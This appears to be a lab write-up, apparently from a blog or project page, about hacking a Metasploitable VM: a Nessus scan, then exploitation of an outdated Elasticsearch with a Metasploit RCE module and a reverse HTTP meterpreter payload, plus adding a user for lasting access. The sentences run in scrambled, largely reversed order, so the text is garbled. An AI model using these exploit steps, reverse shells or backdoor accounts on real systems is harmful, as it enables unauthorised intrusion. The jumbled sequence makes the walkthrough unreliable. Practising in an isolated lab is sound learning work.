![]() Now we will add a user to the group so we can get an account in the target system and we can access the system anytime in the future. 'Set payload java/meterpreter/reverse_http' Step 6: I wrote this payload to get shell access. We set the rhost to the ip address of the target machine. Msf> use exploit/multi/elasticsearch/script_mvel_rce we will use the following command line code Step 5: reconfirm the presence of the installed software that contains the vulnerability you are going to exploit. Step 4: use the command msfconsole to open Metasploit in Kali VM. (it is advisable to update the software installed with new patches to avoid getting hacked). The target machine is running an older version of Elastic Search v 1.1.1 which is an older and unpatched software running on the target machine. I chose the Elastic Search vulnerability. I found many vulnerabilities in that system. We enter the IP address of our target machine. After Nessus has been successfully installed we click on ‘+ New Scan’ in the main Web UI. This can be done by clicking on My Scans and then on the New Scan button. ![]() The IP address of my kali VM is 192.168.217.137 so I used the URL (port 8834 is a TCP/UDP port). After installation, I opened Nessus in a browser in my host system for bigger screen size by going to this URL. I first downloaded and installed Nessus on my kali VM. I assume it was a bad installation or I somehow messed up the other Metasploitable 2. After making several payloads they all work now. test.elf before and it gave me command not found on the other install. Step 2: Perform a scan to check for vulnerabilities. /test.elf on the metasploitable machine and it worked. Step 1: So the first step to get remote access to a computer is to get the IP address of that computer. The IP address of my Metaspolitable VM is 192.168.217.129. We will also add a user to get future access to the target machine. I am including the screenshot of the payload I used and the commands I used. ![]() I used Metasploit in my Kali VM to hack the vulnerabilities and get a shell. I used one of these vulnerabilities to get Remote access to the Metasploitable VM from my Kali VM. ![]() I performed a nesses scan on a Metasploitable VM to find vulnerabilities. Inspiration What it does How I built it Challenges I ran into Accomplishments that I'm proud of What I learned What's next for HOW TO HACK A COMPUTER: REMOTE CODE EXECUTION
0 Comments
Leave a Reply. |